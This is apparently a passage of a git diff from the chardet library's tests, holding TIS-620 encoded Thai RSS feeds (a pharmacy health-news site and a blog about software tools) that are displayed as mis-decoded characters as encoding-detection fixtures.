ֻׂ¡¨׀¡ֵטַׂ¶ײ§ֳֻֽׂׂה·ֲבֵיַ װט§·ױט¢ׂ´אױֲהֱטה´יאֻח¹¨׀א»ח¹÷ֳֳ´ׂא₪ֳ׳טֽ§א·ָ×¹װ´µטׂ§ ז ·ׁי§¢װ§ ¢טׂ µ׀ה₪ֳי ד÷ֱ׀¡ֳ´ בֵ׀×¹װ´·ױטא¾װטֱֳא¼ח´ֳיֽ¹·ױט¨׀¢ׂ´הֱטה´י¡ח₪׳ֽ “¾ֳװ¡” - - ¾ֳװ¡·ױט¾÷ֱׂ¡ד¹»ֳ׀א·ָה·ֲ ה´יב¡ט ¾ֳװ¡×ױי¿יׂ ¾ֳװ¡¢ױיֻ¹ בֵ׀¾ֳװ¡¢ױיֻ¹ַ¹ - - ֳׂ׃₪ׁ­·ױט·׃דֻי¾ֳװ¡ֱױֳא¼ח´ֳיֽ¹¡ח₪׳ֽ Capsaicin «ײט§¹ֽ¡¨ׂ¡¨׀¾÷ד¹¾ֳװ¡בֵיֲַׁ§¾÷ד¹¾ֳװ¡ה·ֲ בֵ׀¢װ§´יֲַ - - ... - http://pharmacy.kku.ac.th/healthinfo-ne/wp-commentsrss2.php?p=394 - - - ֳֻׁ°ֽװµֵׂױֲ׳¹ֲׁ¹₪״³ַװאָֹ¢ֽ§¢ֱװי¹ֳׁ¡ֱֹֽׂ§בֵ׀×טֲַ×׀ֵֽ₪ֱַׂב¡ט×ֳׂ - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=393 - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=393#comments - Sun, 07 Nov 2004 04:42:16 +0000 - - ¢טַׂ״¢ְׂ¾ ×״´·ױט 5 http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=393 - ¹ׁ¡ַװ·ֲָׂׂµֳלֳֻׁ°ֿ¡ׁ÷ֽװµֵׂױ¾ׂ¡ׁ¹µ׳ט¹אµי¹ד¹ֳֳ¾₪״³¢ֽ§¢ֱװי¹ אֱ׳טָֽײ¡ַֹׂװ¨ֲׁה´י¾÷ַטׂ ×טֲַ÷׃ֳ״§ֳׁ¡ֱֹֽׂ§₪¹אֳׂהֱטדֻיא׳טֱֽ·ֳ״´ֵ§ בֵ׀µיׂ¹גֳ₪ֱֽ§½טֽאֽׂהַיה´י - - ¹ׁ¡ַװ¨ֲׁ·ׁי§¢ֽ§ֽװµֵׂױבֵ׀ֳֻׁ°ֿ ¼י·׃¡ֳָׂײ¡ַֹׂװ¨ֲׁ¡ֵטַׂב¨י§ַטׂ ה´י¾÷ַטׂ¢ֱװי¹¼§«ײט§א»ח¹א₪ֳ׳טֽ§ב¡§ד¹ֳֻֽׂׂ¢ֽ§×ׂµװµ׀ַׁ¹ֽֽ¡ֲֵֻׂ×ׂµװ א×ט¹ µׁי§בµט¡״ֱֳֻטׂה»¨¹¶ײ§ב¡§א¼ח´ ֱׁ¹ֱױ¹י׃ֱׁ¹«ײט§ֱױֳֳ¾₪״³µטֽ¡ֵה¡·ׂ§א₪ֱױ ×טֲַ¡ֳ׀µ״י¹דֻיאֽ¹ה«ֱל·׃§ׂ¹א¢יֱב¢ח§¢ײי¹ הֱטדֻיגֳ₪ֽׁ¹א¹׳טֽ§¨ׂ¡ֳ׀÷÷»ֳ׀ׂ·א׳טֱֽא¢יֱׂׂא÷ױֲ´א÷ױֲ¹ה´י - - ¾ַ¡א¢ׂה´י¾÷¨ׂ¡¡ֳָׂײ¡ֹׂ¡ׁ÷ֻ¹·´ֵֽ§ַטׂ ... - http://pharmacy.kku.ac.th/healthinfo-ne/wp-commentsrss2.php?p=393 - - - “¢ֱװי¹ֽיֲֽ” ¡ׁ÷µֳ¾ֽ¡ֻ¹יׂד - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=392 - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=392#comments - Sun, 07 Nov 2004 04:41:41 +0000 - - ¢טַׂ״¢ְׂ¾ ×״´·ױט 5 http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=392 - ¼יֽטׂ¹ הֱט¹יֲֽ µיֽ§ֲֽט¡ֵׂ§ב¨י§א»ח¹»ֳ׀¨׃¨ײ§·׃דֻיד÷ֻ¹יׂא¡װ´ֱֻֽ§₪ֵי׃הֱט´ד א¾ֳׂ׀¶¡א»ֵַב´´·ׁי§ַׁ¹ בֱי¨׀ד×י₪ֳױֱ¡ׁ¹ב´´·ׂ»יֽ§¡ׁ¹בֵיַ¡ח×טֲַה´יהֱטֱׂ¡¹ׁ¡ ג´ֲא©¾ׂ׀ֳ׀ֲ׀¹ױיב´´בֳ§ֱׂ¡ ֲֽׂ¡דֻיב¹׀¹׃ֱ״¹ה¾ֳד×י·ׂ ·׃דֻיֻ¹יׂד÷יׂ§ בµטד÷ֻ¹יׂהֱטה´יא»ח¹½יׂ µיֽ§¡ֳׂדֻיֲֻׂ₪ֵי׃א·טׂ¹ׁי¹ - - »ׁ¨¨״÷ׁ¹ֱ״¹ה¾ֳ·ױטֱױֳֳ¾₪״³´ׁ§¡ֵטַׂ ֱױ¼י¼ֵװµ¢ֲׂ¡ׁ¹ֱׂ¡ֱֲֲֵֻׂׂµֳ בµט·ױטד×יבֵיַה´י¼ֵ´ױֳ׀´ׁ÷ֻ¹ײט§ ₪׳ֽ µֳ “¢ֱװי¹ֽיֲֽ” ·׃א»ח¹¼§µֵַֻׁׁ¡ֱֳַ¡ׁ÷¼§¢ֱװי¹×ׁ¹ ¼§ה¾ֵ´װ¹ֽ¾ֽ§ ... - http://pharmacy.kku.ac.th/healthinfo-ne/wp-commentsrss2.php?p=392 - - - אֵֻיׂא÷ױֲֳלא»ח¹µֱֳַׁׂ׃₪ׁ­µי¹אֻµ״·ֱֳׂ¹¡ׁ÷גֳ₪א¡ׂµל - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=391 - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=391#comments - Sun, 07 Nov 2004 04:41:01 +0000 - - ¢טַׂ״¢ְׂ¾ ×״´·ױט 5 http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=391 - ¹ׁ¡ַװ·ֲָׂׂµֳל¾װ¨¹לה´יבֵיַַטׂ אֵֻיׂבֵ׀א÷ױֲֳלא»ח¹µֱֳַׁׂ ·׃דֻי¼י₪¹µיֽ§·¹·״¡¢ל·ֱֳׂ¹´יֲַגֳ₪א¡ׂµל·ױטֱױֽׂ¡ֳׂ»ַ´÷ֱַµֱׂ¢יֽ ֻׂ¡א»ח¹₪ֽא÷ױֲֳל¨׀ֲװט§א¨ח÷ֻ¹ׁ¡דֻ­ט א¾ֳׂ׀¨׀ֲװט§הַ¡ׁ÷גֳ₪ֲװט§¡ַטׂא¾׳טֽ¹·ױטהֱטבµ׀אֲֵ¶ײ§ֽ§א·טׂ - - ₪ֱַׂ¨ֳװ§אֵֻיׂ¡ׁ÷א÷ױֲֳל¶¡§ֲַׁטׂא»ח¹µַׁ¡ֳׂ¢ֽ§גֳ₪ ¡ׁ¹ֱׂ¹ֱ¹ׂ¹µׁי§ֲֳֵֻׂיֲֽ»ױבֵיַ בµט¡ֳָׂײ¡ַֹׂװ¨ֲׁ·ױטֲֳׂ§ׂ¹ד¹ֳֳַׂׂ¡ֳׂב¾·ֲל “בֵ¹א«µ” ¢ֽ§ֽׁ§¡ִֹא¾װט§¨׀¾װ¨¹לה´יא»ח¹₪ֳׁי§בֳ¡ ב¶ֱֲׁ§÷ֽ¡דֻיֳיַטׂ בֱיבµט¡ֳׂא¾א¾ױֲ§ֱֻֽ»ׂ¡ֱֻֽ₪ֽ ... - http://pharmacy.kku.ac.th/healthinfo-ne/wp-commentsrss2.php?p=391 - - - ב¾·ֲלב¼¹ה·ֲ·ױט₪׃×׀ֽױ - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=390 - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=390#comments - Sun, 07 Nov 2004 04:40:24 +0000 - - ¢טַׂ״¢ְׂ¾ ×״´·ױט 5 http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=390 - “¡ֵ״טְֱֱװ»ׁ­­ׂ¡ֳׂב¾·ֲלב¼¹ה·ֲֽ׃אְֽ₪׃×׀ֽױ” א»ח¹ֻ¹ײט§ד¹ 10 ¡ֵ״טֱ¢ֽ§¨ׁ§ַֻׁ´ֱ״¡´ֳֻׂׂ ·ױט·׃ג₪ֳ§¡ֳׂא¡ױטֲַ¡ׁ÷ »ֳ׀א´ח¹ֱ״¹ה¾ֳבֵ׀״¢ְׂ¾×״ֱ×¹ ג´ֲבµטֵ׀¡ֵ״טֱֵיַ¹ֱױ₪ֱַׂא¢יֱב¢ח§ ה´יֳׁ÷¡ֱֲֳֳֽׁׂ÷ בֵ׀»ֳ׀÷₪ֱַׂ׃אֳח¨ד¹¡ֳׂ´׃א¹װ¹¡ֳׂ·ׁי§װי¹ - - ¾טֵֽיַ¹ ·׀ׂ אֵ¢ׂ¹״¡ֳׂ¡ֵ״טְֱֱװ»ׁ­­ׂ¡ֳׂב¾·ֲלב¼¹ה·ֲֽ׃אְֽ₪׃×׀ֽױ ¡ֵטַַׂטׂ ¡ֵ״טֱ¹ױי¨ׁ´¢ײי¹אֱ׳טֽא´׳ֽ¹ֱ¡ֳׂ₪ֱ 2541 ד¹µֽ¹בֳ¡ד×י×׳טַֽטׂ ... - http://pharmacy.kku.ac.th/healthinfo-ne/wp-commentsrss2.php?p=390 - - - א»װ´₪ֵװ¹װ¡אֲױֲֲַׂ¾װֹב₪´אֱױֱֲ - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=389 - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=389#comments - Sun, 07 Nov 2004 04:39:30 +0000 - - ¢טַׂ״¢ְׂ¾ ×״´·ױט 5 http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=389 - ֵֻׁ§¨ׂ¡·ױט¡ֲֵׂא»ח¹»ׁ­ֻׂאֳ׳יֳֽׁ§·ױטֲׁ§הֱטֱױ₪׃µֽ÷×ׁ´א¨¹׃ֳֻׁ÷×ַׂ÷יׂ¹¾׀א´ך׀ ֽ. בֱטֽ´ ¨. µׂ¡ ·ױטµיֽ§א¼×װ­¡ׁ÷ְֲׁ¢ֽ§ֳׂב₪´אֱױֱֱֲׂ¹ׂ¹ ֵטׂ״´ֳֽ§¼יַטֳׂׂסֳׂ¨ׁ§ַֻׁ´µׂ¡ה´י¹׃·ױֱא¨יֻׂ¹יׂ·ױטֲֵֻֻׂ¹טֲַ§ׂ¹·ױטא¡ױטֲַ¢יֽ§ֵ§¾׳י¹·ױט¾÷×ַׂ÷יׂ¹ ¶¡»ׁ­ֻׂב₪´אֱױֱֲ «ײט§ֳיׂ§₪ֱַׂ¾ֽד¨דֻי×ַׂ÷יׂ¹ה´יד¹ֳ׀´ׁ÷ֻ¹ײט§ - - ג´ֲאֱ׳טַֽׁ¹·ױט 28 אֱֲֹׂ¹ 2547 ¹ֱֲׂ×ֲׁ ֻ·ֲµׁ¹µװ ֳֽ§¼״יַטֳׂׂסֳׂ¨ׁ§ַֻׁ´µׂ¡ ה´י¹׃א¨יֻׂ¹יׂ·ױט·ױטא¡ױטֲַ¢יֽ§¡ׁ÷¡ֳׂב¡י»ׁ­ֳֻׂׂ»¹א»׳יֽ¹ב₪´אֱױֱֲד¹¾׳י¹·ױטֽ׃אְֽבֱטֽ´ ¨. ... - http://pharmacy.kku.ac.th/healthinfo-ne/wp-commentsrss2.php?p=389 - - - ×ַׂ¾׀א´ך׀₪ֳַ­¨׀דֻי·¹ה»¶ײ§הֻ¹ ֱֲֽבֱיµיֽ§¡װ¹¢יַׂ»¹ב₪´אֱױֱֲ - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=388 - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=388#comments - Sun, 07 Nov 2004 04:38:52 +0000 - - ¢טַׂ״¢ְׂ¾ ×״´·ױט 5 http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=388 - ¡ֳ³ױ·ױט¡ֱֳ₪ַ÷₪״ֱ¾ֵ¾װֹ (₪¾.) ¡ֳ׀·ֳַ§·ֳׁ¾ֲׂ¡ֳ¸ֱֳֳ×ׂµװבֵ׀װט§בַ´ֵיֱֽ(·.) ÷ֽ¡דֻי×ַׂ÷יׂ¹ד¹¾׳י¹·ױטֵ״טֱ¹י׃בֱטµַׂ ֽ. בֱטֽ´ ·ױטה´יֳׁ÷¼ֵ¡ֳ׀·÷¨ׂ¡¡ֳׂ»¹א»׳יֽ¹ב₪´אֱױֱֲד¹װט§בַ´ֵיֱֽ ג´ֲא©¾ׂ׀ד¹¹ׂ¢יַׂבֵ׀אֱֵח´¢יַׂ·ױטא¡ח÷א¡ױטֱֲַׂהַיד¹ֲ״י§©ׂ§בֵיַ בµטֲׁ§¢ֲׂהֱטה´יא¾ֳׂ׀הֱטֱױד₪ֳ«׳יֽדֻיֽ´·¹ה»¡טֽ¹ א¾ֳׂ׀ֲֽטֳ׀ַֻטׂ§¡ֳֻׂׂ·ׂ§×טֲַאֵֻ׳ֲֽֽט בµט¡חֲׁ§הֱט×ׁ´א¨¹ַטׂ¨׀אֽׂ§÷»ֳ׀ֱׂ³¨ׂ¡טַ¹הֻ¹ֱׂד×י´׃א¹װ¹¡ֳׂµֳ§¹ױי - - ַׁ¹·ױט 27 ... - http://pharmacy.kku.ac.th/healthinfo-ne/wp-commentsrss2.php?p=388 - - - ₪¾.ַֽ¹×ַׂבֱטµַֽׂ´·¹ה»¡טֽ¹ֲׁ§הֱטֱױ¢יֳֽ״»¨ׁ´¡ֳׂב₪´אֱױֱֲ - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=387 - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=387#comments - Sun, 07 Nov 2004 04:38:19 +0000 - - ¢טַׂ״¢ְׂ¾ ×״´·ױט 5 http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=387 - ₪¹בֱטµַׂ×י׃ֲׁ§ֻׂ·ׂ§ב¡י»ׁ­ֻׂב₪´אֱױֱֲהֱטה´י ¡ֱֳ₪ֱַׂ₪״ֱֱֵ¾װֹֽײ´ֽׁ´ הֱטֳיאֽׂ§÷»ֳ׀ֱׂ³¨ׂ¡הֱֱֻׂ«׳יֽ¢יַׂ ·ױט»ֳ׀×״ֱב¡י»ׁ­ֻׂ¨׀ֵ§¾׳י¹·ױטֽױ¡₪ֳׁי§ 28 אֱֲֹׂ¹ ×ַׂ÷יׂ¹גֽ´₪ֳׁי§¹ױי¢ֽדֻיה´י¼ֳֵ״»¨ֳװ§¨ׁ§ - - ¹ֲֽׂ´װָׁ¡´װל ·ֽ§ה¢טֱ״¡µל ֳֽ§ֽ¸װ÷´ױ¡ֱֳ₪ַ÷₪״ֱֱֵ¾װֹ (₪¾.) ¡ֳ׀·ֳַ§·ֳׁ¾ֲׂ¡ֳ¸ֱֳֳ×ׂµװבֵ׀װט§בַ´ֵיֱֽ (·.) דֻיְֱֹׁׂ³ל₪ֱַׂ₪׳÷ֻ¹יׂ¡ֳׂב¡י»ׁ­ֻׂב₪´אֱױֱֲ»¹א»׳יֽ¹ד¹װט§בַ´ֵיֱֽ÷ֳװאַ³ֵ״יֱ¹י׃בֱטµַׂ µ. ¾ֳ׀¸ׂµ״¼ׂב´§ ... - http://pharmacy.kku.ac.th/healthinfo-ne/wp-commentsrss2.php?p=387 - - - ַׁ¹¹ױי₪¹ה·ֲµֲׂ´יֲַ “ֱ׀אֳח§” ֱׂ¡·ױ״´ - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=386 - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=386#comments - Sun, 07 Nov 2004 04:37:34 +0000 - - ¢טַׂ״¢ְׂ¾ ×״´·ױט 5 http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=386 - ׂאֻµ״׃₪ׁ­ֲֽטׂ§ֻ¹ײט§₪׳ֽ¡ֳׂה´יֳׁ÷ “ֳׂא₪ֱױ” ·ױט»¹א»׳יֽ¹ד¹ֳֻֽׂׂ - -• »ױ 2544 ֽׁµֳׂµֲׂ´יֲַגֳ₪ֱ׀אֳח§§א»ח¹ֽׁ¹´ׁ÷ֻ¹ײט§ ₪׳ֽ 68.44 µטֽ»ֳ׀×ׂ¡ֳ 100.000 ₪¹ -• »ױ·ױטבֵיֱַױ¡ֳׂ״טֱµֲַֽׁטׂ§¾׳×¼ׁ¡¼ֵהֱיֱׂµֳַ¨ֽ÷¾÷ַטׂ ֱױֳׂא₪ֱױµ¡₪יׂ§¶ײ§ֳיֲֵֽ׀ 36 בֵ׀ֲׁ§¾÷ֳׂא₪ֱױµ¡₪יׂ§ד¹ֳֻֽֽׂׂ׳ט¹ז א×ט¹ א¹׳יֱֱֻֽױ¡ֳׂאֳט§ֳׂא¹׳יֽב´§ ֳֻֽׂׂ·׀אֵֽׂ÷¹י׃ֲׂ´ֽ§ָ¾ ¶ׁטַ§ֽ¡ֱױֳׂ¿ֽ¡¢ַׂ ... - http://pharmacy.kku.ac.th/healthinfo-ne/wp-commentsrss2.php?p=386 - - - diff --git a/chardet/tests/TIS-620/trickspot.boxchart.com.xml b/chardet/tests/TIS-620/trickspot.boxchart.com.xml deleted file mode 100644 index 11a911c..0000000 --- a/chardet/tests/TIS-620/trickspot.boxchart.com.xml +++ /dev/null @@ -1,172 +0,0 @@ - - - - - - - TrickSpot - http://trickspot.boxchart.com - one trick. million possibilities... - Thu, 03 Nov 2005 14:24:18 +0000 - http://wordpress.org/?v=1.5 - en - - - moved to –> eb1og - http://trickspot.boxchart.com/?p=63 - http://trickspot.boxchart.com/?p=63#comments - ¾ִ., 03 ¾.ֲ. 2005 21:24:18 +0000 - basic# - - ֽׁ¾א´· - http://trickspot.boxchart.com/?p=63 - - ֲיֲׂ÷יׂ¹בֵיַ₪ֳׁ÷ ₪ֳַׂ¹ױיה»¨´ג´אֱ¹אֳױֲ÷ֳיֲֽ www.eb1og.com

    -]]>
    - http://trickspot.boxchart.com/wp-commentsrss2.php?p=63 -
    - - Alive : But busy - http://trickspot.boxchart.com/?p=62 - http://trickspot.boxchart.com/?p=62#comments - ¨., 23 ¾.₪. 2005 09:00:05 +0000 - basic# - - ֽׁ¾א´· - http://trickspot.boxchart.com/?p=62 - - ֽ׀ב־טֱ ¼ֱֲׁ§ֱױ×ױַװµֲֽט¹׀₪ֳׁ÷ א¾ױֲ§בµט×טַ§¹ױיֲ״ט§(ֱׂ¡ז) א»װ´א·ֱֽ§ׂ¹אֲֽ׀(¡ֽ§·טֱַַֻׁאֲֵ) אֲֵהֱטֱױאֱֵַֽׁׂׂ¾א´· ד₪ֱֳױ»ׁ­ֻֽׂ׀הֳג¾µל¶ֱׂהַי·ױטאַח÷÷ֳֽל´¡חה´י₪ֳׁ÷

    -]]>
    - http://trickspot.boxchart.com/wp-commentsrss2.php?p=62 -
    - - Closed for a While : Changing article system - http://trickspot.boxchart.com/?p=59 - http://trickspot.boxchart.com/?p=59#comments - ֽׂ., 15 ¾.₪. 2005 10:29:42 +0000 - basic# - - ֽׁ¾א´· - http://trickspot.boxchart.com/?p=59 - - µיֽ§¢ְֲֲֽֽֽׁטׂ§בֳ§אֲֵ₪ֳׁ÷ ¡׀ַטַׁׂ¹¹ױי¨׀ה´יֽׁ¾÷·₪ֱַׂ¢ֽ§ WordPress בֵיַ בµט·׃ה»·׃ֱׂאֳװטֱזֱײ¹₪ֳׁ÷ בֵיַ₪װ´ַטׂ¶יׂµיֽ§·׃÷·₪ֱֲַַׂׂזֵ׀אֽױֲ´ד¹ WordPress µטֽה»₪§הֱטהַֻב¹טז (₪¹·ױטֵֽ§ד×יבֵיַֽׂ¨¨׀¾ֽ·ֳׂ÷¡ׁ¹´ױ) ¼ֱאֲֵµׁ´װ¹ד¨¨׀א»ֵױטֲ¹ֳ׀÷÷÷·₪ֱַׂ₪ֳׁ÷ דֻיא»ח¹ב÷÷ Knowledge Base ב÷ט§ֱַֻ´ֱֻטא»ח¹ג¿ֵא´ֳֽל א¢יׂד¨§טֲׂ ֱױֳ׀÷÷גַֻµ÷·₪ֱַׂד¹µַׁ טַ¹ WordPress ¼ֱ¡ח¨׀ד×יµטֽה»₪ֳׁ÷ א»ח¹טַ¹¢ֽ§ג־ֱא¾¨הַיֲֳׂ§ׂ¹¢טֳַׂׂ¢ֽ§אַח÷ µיֽ§¢ְֲֽֽׁהַי ³ ·ױט¹ױי´יֲַ₪ֳׁ÷ - -a

    -]]>
    - http://trickspot.boxchart.com/wp-commentsrss2.php?p=59 -
    - - Article Writing : WordPress - http://trickspot.boxchart.com/?p=58 - http://trickspot.boxchart.com/?p=58#comments - ֽ., 10 ¾.₪. 2005 18:13:50 +0000 - basic# - - ֽׁ¾א´· - http://trickspot.boxchart.com/?p=58 - - µֽ¹¹ױי¡׃ֵׁ§א¢ח¹÷·₪ֱַׂאֳװטֱµׁי§בµט¡ֳׂµװ´µׁי§¢ֽ§ WordPress ֲֽט¹׀₪ֳׁ÷ ¨׀ג¾µלדֻי×ֱד¹אֳחַז¹ױי ֲֽטׂ§×יׂ·ױט״´₪§¨׀א»ח¹ַׁ¹ֽׂ·װµֲל₪ֳׁ÷

    -]]>
    - http://trickspot.boxchart.com/wp-commentsrss2.php?p=58 -
    - - V2 : Out now! - http://trickspot.boxchart.com/?p=57 - http://trickspot.boxchart.com/?p=57#comments - ֽׂ., 08 ¾.₪. 2005 21:59:59 +0000 - basic# - - ֽׁ¾א´· - http://trickspot.boxchart.com/?p=57 - - ֽ׀ב־טֱז ֽׁ¾א¡ֳ´א»ח¹ V2 בֵיַ¹׀₪ֳׁ÷ ÷ׂ§·טׂ¹ֽׂ¨¨׀אֻח¹ב₪טַטֱׂױ¸ױֱדֻיאֵ׳ֽ¡ב₪ט¹ׁי¹ בµטװט§·ױט¨׀בµ¡µטׂ§¨ׂ¡·ױט¼טׂ¹ֱׂ¹ׁ÷בµט¹ױיא»ח¹µי¹ה»₪׳ֽ… ₪ֱַׂ¢י¹¢ֽ§÷·₪ֱַׂ₪ֳׁ÷ «ײט§¼ֱ₪§¨׀ֽׁ¾א´·÷טֲֽזהֱטה´יאֱֻ׳ֽ¹ב¹׀¹׃«ֽ¿·לבֳַל¹׀₪ֳׁ÷ ֲֽׂ¡¨׀ֳיַטׂ¢י¹¢¹ׂ´הֻ¹ µיֽ§₪ֲֽµװ´µֱׂ×ֱ₪ֳׁ÷ ^_^

    -]]>
    - http://trickspot.boxchart.com/wp-commentsrss2.php?p=57 -
    - - Resource Hacker : Resource modifier - http://trickspot.boxchart.com/?p=56 - http://trickspot.boxchart.com/?p=56#comments - ¾., 04 ¾.₪. 2005 19:42:38 +0000 - basic# - - ב¹׀¹׃«ֽ¿·לבֳַל - http://trickspot.boxchart.com/?p=56 - - ¶׳ַֽטׂא»ח¹¢ֽ§אֵט¹·ױטהֱטד×ט¢ֽ§אֵט¹₪ֳׁ÷ µַׁ¹ױיהַי׃ֳֻׁ÷´ resource ¢ֽ§ה¿ֵל»ֳ׀אְ· .exe .dll µטׂ§ז… «ײט§ד¹¹ׁי¹¨׀ֱױ הֽ₪ֽ¹ ֳ»ְׂ¾ד¹µַׁג»ֳב¡ֱֳ ¡ֵטֽ§¢יֽ₪ֱַׂµטׂ§ז ₪ױֲלֵׁ´ בֵ׀ֽ׳ט¹ז «ײט§אֱֳֳׂׂׂ¶א¢יׂה»ב¡יה¢ה´י בֵיַד¹ TrickSpot v.2 ¨׀ֱױ÷·₪ֱַׂ¡ֳׂ¹׃א¨יׂ Resource Hacker ה»»ֳ׀ֲ״¡µלד×י¡ׁ÷ Flash ´יֲַ₪ֳׁ÷ ´ַׂ¹לגֵֻ´¿ֳױזה´י·ױט¹ױט

    -]]>
    - http://trickspot.boxchart.com/wp-commentsrss2.php?p=56 -
    - - CSSED : CSS editor - http://trickspot.boxchart.com/?p=55 - http://trickspot.boxchart.com/?p=55#comments - ¾., 04 ¾.₪. 2005 19:34:43 +0000 - basic# - - ב¹׀¹׃«ֽ¿·לבֳַל - http://trickspot.boxchart.com/?p=55 - - CSS ¹ׁי¹׃₪ׁ­ֱׂ¡µטֽ¡ֳֽֽׂ¡ב÷÷אַח÷א¾¨ד¹»ׁ¨¨״÷ׁ¹ ¼ֱ¨ײ§ֱױ CSS editor ¹ֱַׂטׂ CSSED ֱׂ¹׃א¹ֽ₪ֳׁ÷ ¢ֽ§¿ֳױ₪ֳׁ÷ בֵיֲַׁ§ֱׂ¾ֳיֱֽ»ֳ׀װ·¸װְׂ¾·ױט״´ֲֽ´ֱׂ¡ֱֲׂ… א×ט¹ autocompletion, treeview, code-folding, validator ד¹µַׁ ב¶ֱֲׁ§ֱֳׂׂ¶א»ֵױטֲ¹ syntax highlight ה»א»ח¹ְֹֽׂׂ׳ט¹זה´יֽױ¡ ¡ֳֳׂיׂ§ CSS ×ׁ¡µַׁ¹ײ§א»ח¹אֳ׳טֽ§§טֲׂזה»בֵיַ₪ֳׁ÷ ´ַׂ¹לגֵֻ´ה´י·ױט¹ױט

    -]]>
    - http://trickspot.boxchart.com/wp-commentsrss2.php?p=55 -
    - - Windows 98 SE : Service Pack 2 - http://trickspot.boxchart.com/?p=54 - http://trickspot.boxchart.com/?p=54#comments - ֽ., 03 ¾.₪. 2005 20:44:04 +0000 - basic# - - א¡ױטֲַ¡ׁ÷ֳ׀÷÷ - http://trickspot.boxchart.com/?p=54 - - ÷ׂ§·טׂ¹¡׃ֵׁ§ד×י Windows XP Service Pack 2 ֲֽטד×טֱׁיֲ₪ֳׁ÷ ׃ֳֻׁ÷·טׂ¹·ױטֲׁ§ד×י Windows 98 ֲֽט¡חהֱטµיֽ§¹יֲֽד¨ א¾ֳׂ׀ֱױ Service Pack 2 דֻיאֱֻ׳ֽ¹¡ׁ¹₪ֳׁ÷… µַׁ¹ױיהֱטד×טµַׁ·ױט Microsoft ·׃אֽ§¹׀₪ֳׁ÷ א¾ױֲ§בµטֱױ₪¹ֳַ÷ֱֳַ¹׃ה¿ֵלב¾·×ל׃₪ׁ­µטׂ§ז¢ֽ§ Win98 ֱֳַׂ÷ֱֳַהַי(¡טֽ¹·ױטֱׁ¹¨׀»װ´ֽׁ¾א´·Win98ה») בֵיַ·׃ֳ׀÷÷µװ´µׁי§ב÷÷א÷ח´אֳח¨ֳַ´א´ױֲַ ׀´ַ¡₪ֳׁ÷ ·טׂ¹ד´ֲֽׂ¡ֵֽ§ד×י÷יׂ§¡חא×װ­´ַׂ¹לגֵֻ´ה´י·ױט¹ױט₪ֳׁ÷

    -]]>
    - http://trickspot.boxchart.com/wp-commentsrss2.php?p=54 -
    - - GTidy : GUI for tidy - http://trickspot.boxchart.com/?p=53 - http://trickspot.boxchart.com/?p=53#comments - ¨., 02 ¾.₪. 2005 18:30:34 +0000 - basic# - - ב¹׀¹׃«ֽ¿·לבֳַל - http://trickspot.boxchart.com/?p=53 - - ₪״³ב¹טד¨בֵיֳַֻ׳ַֽטׂ html ·ױט₪״³¾ֱֲֲׂׂא¢ױֲ¹¢יֱַׁׂ¹¢יֱׂ₪׳¹¹ׁי¹ ¨׀¶¡µיֽ§µֱֱׂׂµֳ°ׂ¹? הֱטµיֽ§µ¡ד¨בֵיַ¡ֵׁ÷ה»א»װ´ב¡יה¢₪ֳׁ÷ א¾ֳׂ׀¼ֱֱױµַׁ×טֲַב¡יה¢ג₪ך´ html דֻי¶¡µיֽ§µֱֱׂׂµֳ°ׂ¹ֱׂא¹ֽ₪ֳׁ÷… ÷ׂ§₪¹ֽׂ¨¨׀א₪ֲֳי¨ׁ¡ HTML Tidy ֱׂ÷יׂ§בֵיַ «ײט§ֱׁ¹₪׳ֽµַׁ×טֲֲַֽטׂ§·ױט¡ֵטַׂהַי¢יׂ§µי¹ֵט׀₪ֳׁ÷ בµטֱׁ¹א»ח¹ command line ₪ֳׁ÷ ·ױט¼ֱ¨׀¹׃ֱׂא¹ֽ₪׳ֽד¹ֳ»ב÷÷·ױטא»ח¹ user interface ד×י§ׂ¹§טֲׂ ׀´ַ¡ֳַ´אֳחַ₪ֳׁ÷ ֱׁ¹ֱױ×׳טַֽטׂ GTidy ´ַׂ¹לגֵֻ´ה»ד×יה´י¨ׂ¡·ױט¹ױט₪ֳׁ÷

    -]]>
    - http://trickspot.boxchart.com/wp-commentsrss2.php?p=53 -
    - - HelpMaker : Help authoring tool - http://trickspot.boxchart.com/?p=52 - http://trickspot.boxchart.com/?p=52#comments - ¨., 02 ¾.₪. 2005 18:05:53 +0000 - basic# - - ב¹׀¹׃«ֽ¿·לבֳַל - http://trickspot.boxchart.com/?p=52 - - ׃ֳֻׁ÷ד₪ֳ·ױטֱֽ§ֻׂµַׁ׃ֳֻׁ÷ֳיׂ§ help file ֳֻ׳ֽ e-book ´ױזֲֽטֵט׀¡ח ¼ֱֱױג»ֳב¡ֱֳµַׁא¡ט§¹ֱַׂטׂ HelpMaker ֱׂא¹ֽ ֳׁ÷ֳֽ§ַטׂהֱט·׃דֻי₪״³¼װ´ַֻׁ§ב¹ט¹ֽ¹₪ֳׁ÷… ¹ׁ÷¹״¹ְֹׂׂה·ֲ ·׃§ׂ¹ֳטֱַ¡ׁ÷ Word ה´י ב·ֳ¡ֳ»ְׂ¾ ¨ׁ´ֳ»ב÷÷¿ֽ¹·ל ֱױֲֵֻׂה¿ֵל¿ֳֽלבֱ·דֻיאֵ׳ֽ¡ד×י »ֳׁ÷בµט§ֲֳֵׂ׀אֽױֲ´ה´יֵֻׂ¡ֲֵֻׂ ֲֽטֳֽׂ×יׂ₪ֳׁ÷ HelpMaker 